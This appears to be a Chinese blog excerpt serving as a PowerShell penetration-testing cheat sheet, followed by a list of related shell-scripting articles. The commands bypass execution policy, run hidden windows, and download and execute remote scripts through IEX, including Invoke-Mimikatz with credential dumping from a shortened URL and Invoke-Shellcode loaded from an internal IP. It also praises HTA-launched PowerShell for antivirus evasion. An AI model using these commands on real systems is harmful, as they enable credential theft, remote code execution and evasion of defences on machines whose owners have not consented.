PowerShell
2015-09-30 16:02
471 查看
摘自:《powershell内网渗透_light》
本地权限绕过
本地隐藏权限绕过执行脚本
直接用IEX下载远程的PS1脚本回来权限绕过执行
内网渗透实例
远程代码执行:
目标主机‘安装’invoke-shellcode脚本
查看帮助信息:
有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:http://www.freebuf.com/tools/90362.html)
本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1
直接用IEX下载远程的PS1脚本回来权限绕过执行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
内网渗透实例
远程代码执行:
IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/path/xxx.ps1”)
目标主机‘安装’invoke-shellcode脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")
查看帮助信息:
Get-Help Invoke-Shellcode
有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:http://www.freebuf.com/tools/90362.html)
相关文章推荐
- bash脚本编程(待续)
- 了解bash shell及其基本使用
- PowerShell 变量(Variable)
- linux shell 自定义函数
- shell——wget命令
- linux shell “(())” 双括号运算符使用
- linux下创建shell脚本
- XShell连接不了虚拟机linux Could not connect to '127.0.0.1' (port 22): Connection failed.
- shell编程中的$@和$*的区别
- Shell脚本编程与sed,awk工具的使用--9月15日课程作业
- shell 玩转文件描述符 和 重定向
- shell 之进行数学运算 let expr bc 中括号
- shell脚本编程-例子_批量添加用户脚本
- PowerShell 对象(Object)
- bash background tasks
- shell——变量自增
- Linux Shell脚本编程--netstat命令
- shell ——grep
- shell基础特性3
- 通过C++和shell脚本去解析URL && c++调用shell脚本后将脚本的内容返回给程序